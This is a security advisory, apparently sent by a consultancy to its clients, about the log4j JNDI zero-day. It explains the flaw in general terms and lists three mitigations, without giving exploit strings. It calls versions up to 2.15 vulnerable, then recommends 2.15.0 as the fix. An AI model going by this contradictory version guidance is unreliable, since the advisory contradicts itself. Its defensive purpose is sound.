We sent the following notice to all Fractional CISO clients yesterday.
We are sending this notice to all Fractional CISO clients to inform them about an extremely critical zero-day vulnerability that requires immediate attention – right now, not on Monday. This vulnerability is pervasive, Internet-facing, and easily exploitable by anybody with limited hacking experience.
What’s happening:
A vulnerability was announced recently that affects the popular Java logging library “log4j”. This vulnerability is extremely serious because even trivial exploits can lead to complete compromise of the affected systems.
Are you vulnerable?
Assume you are vulnerable until you confirm you are not. Further, if you have a vulnerable system you may already be exploited. Specifically, anyone using Java server and java client applications with log4j from versions 2.0 (released in 2014) to 2.15 (released this week) is vulnerable. Log4j is used in almost all Java applications – if you create Java code or use Java applications, you are almost certainly vulnerable.
What you need to do:
Survey your environment for java applications, both code you create and 3rd party applications.
Option 1: Upgrade log4j to version 2.15.0.
Option 2: If using log4j 2.10.0 to 2.14.1, configure log4j with “formatMsgNoLookups=true”.
Option 3: If using a version older than 2.10.0 and cannot upgrade, modify every logging pattern layout to say %m{nolookups} instead of %m in your logging config files.
More information: https://www.lunasec.io/docs/blog/log4j-zero-day/
How does the vulnerability work?
Log4j is used to configure logging in applications, such as webserver access logs, which often contain data submitted by the user browser, like a URL request or User-Agent HTTP header. The vulnerability relates to how log4j processes the user data that may contain “JNDI” variable references. Using these variable references, attackers are able to trick log4j into remote executing code on vulnerable systems.
Going forward, it is going to be critical to block this traffic from java applications. Vendors are probably working on this tooling now – be on the lookout for messages and updates.
More Information: https://www.pcmag.com/news/countless-serves-are-vulnerable-to-apache-log4j-zero-day-exploit